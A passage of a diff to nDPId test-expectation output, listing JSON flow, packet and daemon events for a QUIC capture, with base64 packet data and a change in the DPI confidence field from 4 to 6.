Eoougf\/rRSL7RNh\/DgbwKlBhtRbBjEQ\/fei4q7M4c5UJkO+skPmmiMvYCQhOGRb6M75LAcuzVGQ8XTpzS4Q49h3haLUT7LCYbVjfGyqoeek1PufbtNM7RA9oB6986rRvq1HME2Qh77x8xxPIkwZHbkxc\/bKYMzPnJ2UeHA+V+TItjasVAOkyFvBZpJobZJOx5lM+v4cwtiH2ykJPHJYMbL8uQhYq741WaUualB49TABJ2lncw6tGeQpg0Oc\/Ffn7jPYQNW8CiZh2MKru7wG5Af2I7ggRC0CDFHJi4CcaHMbjEL8xmaCoe7kEiBjZVMpQq8yq8HDVmX6xuiwGFbSpnmw7737hgdBgSQgsmzZ+eyRAnkDX7sSqv9hCS0Zcb3DoP4XMm+5jI\/u\/CnNPitv0yoNrGp5yiS0Bb3cyT9aVQMRpm5+oM6J8FgVTuiAzbLFQfG28vM2HH6RzkRHWgAdyYhr1dpw2Zy7iTAPNVWd1SULG1vIgBDQMenfFa7JoTVJsPivxw59Fc6nxyGVmp7UaHrhQVYqlLcKnPC62iMBiWrPAYZFn5ijxczxoNDc6ynoTmgTnNCK4rH5wD4cRLasJRPJwZqqD20+m0sIXMeyDt2b+cU4j\/UFP20j2zVAVzNgz5C8yIdFJDfygcCX1uMo4LGqi5N+2qh3+XEDAJQkfWgO2sWhpJa\/W6mNUejnWaDgkXgNbiL8BtuKDTdIalY78bJmkO8h2Cl7UuEPHZbPJY1CNBXdiCdtfcR\/\/69FKUtxyHLd44Txaub7ezT8XT\/2j1TO5ZpJK2c9CQslposHRZIXcQpmszsY7beFygv4KRpcCyDhjXHdoMk4Cx6Zf322ZH0visL\/1\/gL4MdUJwQBy3KCD2JhsiDqFkE3JPopsXvIIsTgN2itT8qn30ZnTFxpcPjawKM8R8YmcFcSfJXzy9S4n3fG5zVGgQhv+APAzodhVQyyG6paPspPsNKi3e6pZse6mfJbU+RHKTdtZrGwzhUbQsLxNpwTzdCArEwHBFERYdg28g2amHvk3VyhEJlMpWUR4CasyIc0tQUYMkJaCUUlS0aWSy5Tnhj9mf3ScVUNZtHYvoFQgMdxMVZR0ICCfvHTrO6AtY5\/AI2NI8kYvvIj5Qw+wIOEUvx1PjAGLWbH4JzLOrTxTHK"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 
Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1621434304066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621434304066,"pkt":"AAAAAAAAAAEA4PSECABFAAViGypAAH4RcNqokEAFie75AuGHAbsFTmxnxP8AAB0I6APGIi8XMbMANwAf+\/1CDYfNSqZV6JuY2eU0m84t1CHbeC6cE\/+erbLQOHtC\/LsGzIyDeeVGEgpwCWPVi+MQCnZE\/Ygc2mi4SLeix+8TnlYUcEJa7kzg6S+7lKmfSMXvMlPqpt8Jqhul99eiai\/CwIIhzgiuj7qKQafo1JRj2kBZbTRDU1+SZHOQN7e5Nj19ARXzRQ1f1x+ihAp61tvIBTDRPDLXc1ubHgvyinj5MfnF\/12s5SMxBHDDCXN3NmqXQxAS4MECv72MUs94PMpz9zGUL5LHUzGHAIbclxnzN7sHd1go4+lLCWey570KhMF8PzFiMw5ory1Vew4LX22LtMy2jvvM1vnDE1crnUnJCzQDcgJHDiRsasjBdtp7HdISribAOc8CB2obB0oyyA5X8m4qhy5s84s74KgzXgyxL59PIeQSEcVb59yBdZjMcyXXJ80CrHVTLXNi4PQyHnn48osYeAyUn8yU3VqEWwgftLAi39oJlXsQyCTXsKmuL7OB7gY7Vuai77q03lFhqfHaX9cLtEypQIWNB2r\/l2ALpr13EuKe2oyXGUuf78i9rQmSYgbO4A4y3MRD\/QqZXl\/77HpSb03kGClkTea21fqnpJT\/zJSYfPYFvCXBYWmiAW9wMzLsKUQeqeHCc1gL7imhRXQ4PrR2LeuOgoR5+fRtqAenht6XH9lUHNUo32hs\/wjLrrHX9gnX1hALWGhcNyMLvpFTjI5tPVKkRbNv5c3mJilmNWHxhjVHpnhQDdE3xh\/NfcCROvsyq5m28OWLWcPE2FvU5KBMY6t0tV0A4eoef29jjCAjLO\/M8mpZb7ujaK\/6H5Re8VFYbLmxdrQraYtMIxWND\/984VqRyFoxBrQh6ygpK33dCrOTNkgS2NHt4BbEN3kBlcM\/dJxkQlX\/WhjdaU\/jKdtFt12Kk5gsUCyahX7xPzli0x1FX\/Q6DmOvGVlWQmKwwBBrReFKQe+WYt51ygXzik317+tRLkmZwIN6Nf5C1O+PyUMA7NiOjHZECt9SxgRFTLngwK\/BOvB+tJVNrOjrc5ouhUeeMBFLaijzDUDK1PsEMcF3KYI4t\/ROzLfqLIxLRK+vFjZLKp8b\/lca3pPTeuTvHMH9GjJ0X9j4ISArXi3WDjwMH\/Ow1fIn6CTlfV8aDmzMvW0v9ZGuQXxYq3FVxoJ6jyGNfEJzY+Tal8doePa4R1YqwbnqHBlxYcCHiNxYcJir\/3tIthYf6C7p1vYTQ0q9zzsSi9ab+onOdI4XXVybeJLwUU0vgi23+ITCo5zV6ESOFAjb+YSOsYgwePhG2z0W6PMf7nvnuMEzAy1AOgdBeakrjggSIvTuM3izkIHo3vfWd9R+DyKdj7JlM\/HRJmVAHwQIB+FHDGPxLbMFK9o+C4TYA4LeNTQ2YMqk6y7D+GRumXbZ\/9OD7PDPvEuiASsqlgc7rtO5TmRCZno3ukk8JNtthovwosB91+YQlqUUew2kq+
cJr8mtfNeNdB4fYgAJJqJbMWJd6QOv52uYyuvINUeitOOi64uHklHkyRistUgemwXXe7otvzQLzpEQlEHAtTBMiKoZve\/eJFLoSA8M6gHeOxwAnJqUrU74jdXSt1xL+HU2Hynt8\/YtqB6Ky+qMw0VdxI8dMW6f6iKuz3JMrpbMCfeILC76cPYJAI0R1JC+ZQwx6QeScq+kiLVZZk4THRZ2H5yZznb9iTrWTpZBeU0\/nsuUhcsqOtw38xuyp6cqnniKTRwy7qgYC9\/RKw732DLUQ1HhQkZ5LproX0hXWsSSQ8AXfC29DpYL"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"ade.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"ade.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 
00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":98550,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":61,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":61,"total-idle-flows":60,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":263,"global_ts_msec":1621486316206} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1621486316206,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486316206,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZWtAAH4R2n40uxSv0OWdUcWcAbsFTrOSyf8AAB0I+xTa7lKQafkAAEU0jTWyhjWmo3c2c8tkYAeIRC00J2hfh\/j02rOWVtYboU9UivrOMDnb4DlblCS28uJrMkjjwdTtO22vVFwPaYxj2IIflFADqJCdVuHcXcnvIynZuH\/49aoZoAl2YJS8pUl6yCn3zcPhaVYM3BWJHJ12bT\/rBl+QUhFz+eNv1NjusSyo7XRmUXDT9LZCM\/KsdcUeJxbJMKMhLKDH81GMtpYCHwWUPWqqO9e9hvA+yFxWoDib4NbLv3\/NPWniDKh36sKuVx\/WIkOp5AaTQLzBliiDDxtF80Iy3ba1w3uKH81kscAY6jISZDkCGIpkH83a9jbwNNTu4dDGSDZa7\/6HH5W20Tq4MhhXWYZTT\/8h1Oy0puUFllXhqXmIg8+2Grn5B+DCtffivNTxawD23zhZYDMa5O4Knv1pxKsoCPI9uGjVARZ4WxoinnBJ4Lx\/eivjiy\/9wUiLC2t3yBsy7scxzTv7a9B56haRYFOHLBvLzNjV2ReQFucDRZ194sZlbUdGn8MFTzauGKyE8FjTABrbToSZZkd+s9mIdwH35yLr658ZiMm1iQSdaUX3AcvdyYuEGp8MnQAMvaoRfRnnmkSaFBBjiB2OIsBm5yjfjQzpYtX97hEeUwSv5yqk9ySGiUJXi\/5hLfad84l42JzVEw9YlxyakiWEDTCs6mdaMom7vY\/Iha1i3AZ8pf3WkhBJ3b2\/2DKVs0REkOZgjTqzdd\/K4AfSFcDL8A1CiF09bQ+eTVXaS+xpmL5GSTVDyTRM40KZfUhO\/T9EQZtNPiniyNqbtSZp2BYc+\/2l9wdhMEjiEKO6wYoSeRFPJBNsw+m7Su\/ssmDRlXGBnVI6tlHZWM7CBp7yEtJ+9b5lh\/h2b6o8NLXzXZmB94SFM5zpx3nqn4s+YimdYWtGhQxRDQoKolK3iglu1GOcgjHmAJkQjEjCoXuY5Z3wxhAtlHkChB4D4Sj+Mo0Pe8PuHQ3hvPSuLwFw0FqDm7Rspzd6alV6wevE9brqF0ttPmCgs8akAeLH3Hg2jOzJR7Zq8KSRDJyhC5wYRQJomZdHmhVl6k0hQlrOPsbeG33RJrOXASmtURkVNrkqMFtEbzD+nJJcxlWpn49Ehl9m2kKOIs1drmrTjCgOrpMNceU36z6U7NKS4u4a1hVFTMi1YV9BCf0SrTjGuouERb51jAiRXHvLt9eC3HlqplhkgSDMr8ATClK+9EeI5ZYJ+qwQ1oNpZdKQHsnK3rftNgPnZFIeVe2LSvMENi8FH6YjUWMcIEMIxUvHXWmhFLzwRkjM\/dETZG8LtSp9lIP+R6o2M+Z0pn4VC09fNocjGnGygpS8xtImvQ9Xi52Wji0Mxqp\/ox1cXlDhElkji1gScwsWqwExhfJEHyZrsxDoSgYL92Z1Pn4HBsnIkQM7VPxnWWnZFJ2LkCfQ6AL5v6LxfRd1eQDzaT8j2cXS+hAnjFgH8roiknWfHzSVGVNaIySwi6Gz
icPRwiTXqCSzzyJiRjY7LO2cY4SJmX6FqWWTL2hOvjoCvsVA2cZN1um+uHaF8+jCaYrlDihaV62byo0sQX49iEOMQc4cm5w+ac672idPEvZbXjaLZaKlnjbEhQJQMWC\/nDrqdHevi8VXVL66zosdlIzNI74mdhJfTd8oc2ovgBinEH9PA2Lqf8or\/1dRozLWj6+nG686ciLUDqT0aDB8JAQ3nq+eUFn83ml\/py\/lqV4T0XXeWonhVytFKd1udnPL0depml6Dv31txugFaXuB9swFjUHsdQbAqQI4U08c1YRaBctk"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1621486316485,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486316485,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZXhAAH4R2nE0uxSv0OWdUcWcAbsFTqeoxf8AAB0I+xTa7lKQafkAAEU02NqFlwI2X\/88ClDrDdUJKCRw\/slmHtAOwvb06+QlMjRjV0hs2aYrH3dl2vG36AHZbKvCCu+8tbZyidkId\/SwRLk\/aGUb9L+x4bKEhyji10luTyL48ncebSgio1Ylf2sP5y7qYToItoOHdM+sF4EspTkGPS58+WD5u+L5sXHLzRq6EFovw7tEFm4rXT1ncWUZsfHN3bUzi7UC\/xILKAQ258ulh3E12ZSv8bupoSOwAKHtGPJmU5UDctMjcbxM4bIIF8Y3B8utqsAN8n4iNen\/hK6bsT+7MeKDyJk8GvgeIX4qPhGkfCyzy2ZSx5In0Gj9mMFlrQlbRzQtMTQJLS9XHGrBJjKt7Kwt4iHS3C2\/ll+JnHv3jFSbkwPkaj4L9zsoUsRbA4HR60OvfubceMHwPcwpOKS\/YhEEpiSIRwK1XH4b0OZUCFWXt2vsvHXiJx7CWD5E6BOBg+ZYetFelTfuQxNgfXROtoGuJ+3wQxi2DRGnFXCHGYLoAO8i4AAIvpgGgoqzjNM1BmQvfSO\/X4dZ8fc7Fo7vdxAVJZrJXT4m2TBKFrsawVChuoJH67VOmFJS1xgFWukI7zRJtsXhN7Czc+i9T8YtKZjInSr9AVxgs0c5d\/WCQetSMLQd\/JT5oa0sx8n2J7Z2NcU99xovxV2uKz4qjrx\/Y2k6ZoB9x3f0Yg6sfXGEGo2MQD\/7z+LWRPw2gSm3FEw8jwVDd9S8o7TTxjGKX94D5vYTcchFQTfbn2HfhKqR8F1OQIlO\/wsmxlHMHBvFUjUhJiIPWRLZt9vP+JJ4qKw7nADsc3kkxPCiHPpOD07HQF+XsbdLrhdRPVrhK5WXHFkyBU\/dGYYuv1WiPzMaGJvkyCOgbXcAH3Gb5PcTDyew+MRzHK03TijcWQ+ZOoouVFzsL9ai7HJq8AhiXpNhyx1MICcuUOAIBkQWFqamjY7zI2GJ\/c8jdNXGDAcYVSSmicj+n+x1og23m\/OzzTHzOLv1hr3DJu3hQFGpKefyvQXTCQ\/t38x1oKMoJcBam+ydIiQL\/qBv8Cn9WIgDhZCWjY0H1Zu8jJgS\/pZVcJ7m1gqv0WsKI2s926YbdUCbQTSDQMHYPrbnBQU2zGsddtUkHA8smR00xItuhuXFpHntBzWrCuuKLbpV6LTA5KLTpwJmEru6UaR8hWJdlNusN0FzSumL2gnW0wHATZvtmTr71efZIP5glV9Q2+vjbPwcPmHOjEAqqO8a9LEnQ9t0
